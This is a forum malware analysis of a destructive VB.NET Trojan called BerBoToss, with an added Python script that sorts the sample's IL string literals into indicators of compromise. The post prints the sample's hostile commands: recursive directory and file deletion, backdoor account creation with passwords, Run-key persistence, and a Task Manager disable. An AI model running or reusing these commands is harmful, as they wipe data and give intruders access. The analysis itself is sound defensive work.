Hi,
It is a Windows PE EXE file, written in VB.NET.
This Trojan performs several malicious actions: destroying and altering data with malicious intent, causing computer malfunction, displaying an informative message and logging the user out of the system after creating new password-protected user sessions. This malware sample has very basic infection methods and aggressive behaviour, deleting specific files.
Last sample 1/41 VT Scan
http://www.virustotal.com/fr/analisis/d ... 1279046904
Filename: BerBoToss.exe
Language: MS Visual Basic.NET
Author according to version information:
3an9oud-La3jeb Hackers
Maroc Fes City BerBoToss
Session name: 3an9oud-La3jeb
Password: 1MarocBerbotossFes
Session name: Berbotoss_L39
Password: 1MarocBerbotossFes
Session name: Fes_L39_Berbotoss
Password: 1MarocBerbotossFes
Session name: Administrateur
Password: 1marocberbotossfes (note: lower case)
Disable Task Manager:
.method public static void DisableTaskMgr(bool Enable)
.locals init (bool V0)
switch DisableTaskMgr_0, DisableTaskMgr_1
DisableTaskMgr_1:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
ldstr "1"
callvirt SetValue
DisableTaskMgr_0:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
callvirt SetValue
Create text files:
ldstr "C:\\wmnpdmod.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\msimg32.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\kbdhe340.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
Kill processes:
ldstr "firefox"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "IEXPLORE"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "notepad"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "msnmsgr"
callvirt void [System]System.Diagnostics.Process::Kill()
Copy itself:
ldstr "cmd /c copy BerBoToss.exe C:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe E:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe F:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe D:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe g:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe C:\\WINDOWS\\BerBoToss.exe"
Create new user sessions:
ldstr "net user Administrateur /add"
ldstr "net user Fes_L39_Berbotoss /add"
ldstr "net user 3an9oud-La3jeb /add"
ldstr "net user Berbotoss_L39 /add"
ldstr "net user Fes_L39_Berbotoss 1MarocBerbotossFes"
ldstr "net user 3an9oud-La3jeb 1MarocBerbotossFes"
ldstr "net user Administrateur 1marocberbotossfes"
ldstr "net user Berbotoss_L39 1MarocBerbotossFes"
Rename hard disk labels:
ldstr "label c: 3an9oud-La3jeb"
ldstr "label d: 3an9oud-La3jeb"
ldstr "label e: 3an9oud-La3jeb"
ldstr "label f: 3an9oud-La3jeb"
ldstr "label g: 3an9oud-La3jeb"
ldstr "label h: 3an9oud-La3jeb"
ldstr "label l: 3an9oud-La3jeb"
Delete NET sessions:
ldstr "cmd /c NET SESSION * /del"
ldstr "cmd /c NET SESSION \\poste_connect? /del"
Remove directories:
ldstr "cmd /c rd d:\\ /s/q"
ldstr "cmd /c rd e:\\ /s/q"
ldstr "cmd /c rd f:\\ /s/q"
ldstr "cmd /c rd g:\\ /s/q"
ldstr "cmd /c rd C:\\WINDOWS\\system32\\drivers /s/q"
Delete specific files:
ldstr "cmd /c del C:\\*.mp3 /s/q"
ldstr "cmd /c del C:\\*.jpg /s/q"
ldstr "cmd /c del C:\\*.zip /s/q"
ldstr "cmd /c del C:\\*.rar /s/q"
ldstr "cmd /c del C:\\*.lnk /s/q"
ldstr "cmd /c del C:\\*.3gp /s/q"
ldstr "cmd /c del C:\\*.lrc /s/q"
ldstr "cmd /c del C:\\*.html /s/q"
Set new system time:
ldstr "cmd /c Time 11:11.00"
Set new system date:
ldstr "cmd /c date 01/1/1987"
Lock workstation:
ldstr "cmd /c rundll32.exe user32.dll,LockWorkStation"
Start default Internet Explorer:
ldstr "hxxp://fassifasso.tripod.com/xxx.xxx/BerBoToss/index.html"
call class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::Start(class System.String)
Set malware startup:
ldstr "cmd /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v BerBoToss /t REG_SZ /d C:\\WINDOWS\\BerBoToss.exe"
Clipboard:
callvirt class MyServices.ClipboardProxy Devices.Computer::get_Clipboard()
ldstr "BerBoToss V1.0"
Display message:
ldstr "BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum _+... Daba AdiosS Amigoss"
ldstr "Maroc Fes Erreur HTTA 39 - Mardankore.dll ... & "
call value class MsgBoxResult Interaction::MsgBox(class System.Object, value class MsgBoxStyle, class System.Object)
box MsgBoxResult
Attachments
Pass: malware
(6 KiB) Downloaded 69 times
pass: malware
(5.73 KiB) Downloaded 67 times
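As an added example (not code from the original post, the forum, or the sample's author): a small Python triage helper that pulls the ldstr literals out of an ildasm-style dump of a .NET binary and sorts them into the same kinds of categories used in the write-up above (shell commands grouped by verb, accounts and the passwords set for them, registry paths, dropped files, drive labels, Run-key persistence, URLs). The SAMPLE_IL text is constructed from strings quoted in this post and laid out the way ildasm prints them; it is not a real disassembly of BerBoToss.exe. The category names and the command heuristics are assumptions of this example, not anything the sample or ildasm defines.

```python
"""Added triage helper, not part of the original post or the BerBoToss sample:
pull every ldstr literal out of an ildasm-style dump of a .NET binary and sort
the literals into behaviour categories (shell commands by verb, accounts and
the passwords set for them, registry paths, dropped files, drive labels,
Run-key persistence, URLs). Category names and the heuristics below are
assumptions of this example, not something the sample or ildasm defines."""
import json
import re
from collections import defaultdict

# Constructed input: a few of the ldstr lines quoted in the post, laid out the
# way ildasm prints them. Offsets are made up; it is not a real disassembly.
SAMPLE_IL = r'''
  IL_0000:  ldstr      "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
  IL_0005:  ldstr      "DisableTaskMgr"
  IL_000a:  ldstr      "1"
  IL_000f:  ldstr      "C:\\wmnpdmod.dll"
  IL_0014:  ldstr      "cmd /c copy BerBoToss.exe C:\\WINDOWS\\BerBoToss.exe"
  IL_0019:  ldstr      "net user Administrateur /add"
  IL_001e:  ldstr      "net user Administrateur 1marocberbotossfes"
  IL_0023:  ldstr      "label c: 3an9oud-La3jeb"
  IL_0028:  ldstr      "cmd /c rd C:\\WINDOWS\\system32\\drivers /s/q"
  IL_002d:  ldstr      "cmd /c del C:\\*.mp3 /s/q"
  IL_0032:  ldstr      "cmd /c rundll32.exe user32.dll,LockWorkStation"
  IL_0037:  ldstr      "hxxp://fassifasso.tripod.com/xxx.xxx/BerBoToss/index.html"
  IL_003c:  ldstr      "cmd /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v BerBoToss /t REG_SZ /d C:\\WINDOWS\\BerBoToss.exe"
'''

# A literal is "..." with C-style escapes, so backslash-anything is one unit.
LDSTR_RE = re.compile(r'ldstr\s+"((?:[^"\\]|\\.)*)"')
IL_ESCAPES = {'\\': '\\', '"': '"', 'n': '\n', 't': '\t', 'r': '\r'}
URL_RE = re.compile(r'\b(?:h[xt]{2}ps?|ftp)://\S+', re.I)   # also matches defanged hxxp://
DRIVE_PATH_RE = re.compile(r'^[A-Za-z]:\\')
REG_ROOTS = ('HKEY_', 'HKLM', 'HKCU', 'HKCR', 'HKU')
# Actions the sample passes to a shell without the "cmd /c" prefix.
BARE_VERBS_RE = re.compile(r'^(net|label|reg|rd|del|copy)\s', re.I)


def unescape_il(lit):
    """Undo ildasm's C-style escaping inside a quoted literal (\\\\ -> \\, \\" -> ")."""
    out, i = [], 0
    while i < len(lit):
        if lit[i] == '\\' and i + 1 < len(lit):
            out.append(IL_ESCAPES.get(lit[i + 1], lit[i + 1]))
            i += 2
        else:
            out.append(lit[i])
            i += 1
    return ''.join(out)


def extract_ldstr(il_text):
    """All string literals loaded with ldstr, in program order, unescaped."""
    return [unescape_il(m) for m in LDSTR_RE.findall(il_text)]


def triage(il_text):
    """Sort the literals into indicator categories. Returns a plain dict."""
    res = {'commands': defaultdict(list), 'accounts': {}, 'registry': [],
           'files': [], 'urls': [], 'labels': [], 'persistence': [], 'other': []}
    for s in extract_ldstr(il_text):
        cmd = s[len('cmd /c '):] if s.lower().startswith('cmd /c ') else None
        if cmd is None and BARE_VERBS_RE.match(s):
            cmd = s
        if cmd is not None:
            toks = cmd.split()
            verb = toks[0].lower()
            res['commands'][verb].append(cmd)
            if verb == 'net' and len(toks) >= 3 and toks[1].lower() == 'user':
                # "net user NAME /add" creates; "net user NAME PASS" sets the password.
                if len(toks) > 3 and not toks[3].startswith('/'):
                    res['accounts'][toks[2]] = toks[3]
                else:
                    res['accounts'].setdefault(toks[2], None)
            elif verb == 'label' and len(toks) >= 3:
                res['labels'].append((toks[1].rstrip(':').upper(), ' '.join(toks[2:])))
            elif verb == 'reg' and 'currentversion\\run' in cmd.lower():
                res['persistence'].append(cmd)
            continue
        if URL_RE.search(s):
            res['urls'].append(s)
        elif s.startswith(REG_ROOTS):
            res['registry'].append(s)
        elif DRIVE_PATH_RE.match(s):
            res['files'].append(s)
        else:
            res['other'].append(s)   # value names, data, message text
    res['commands'] = dict(res['commands'])
    return res


if __name__ == '__main__':
    print(json.dumps(triage(SAMPLE_IL), indent=2))
```

Run it against the output of `ildasm /text sample.exe` (or any tool that prints ldstr literals in the same quoted form) instead of SAMPLE_IL to get the IOC list for a real sample; the `other` bucket is worth reading by hand, since registry value names such as DisableTaskMgr and the message-box text land there.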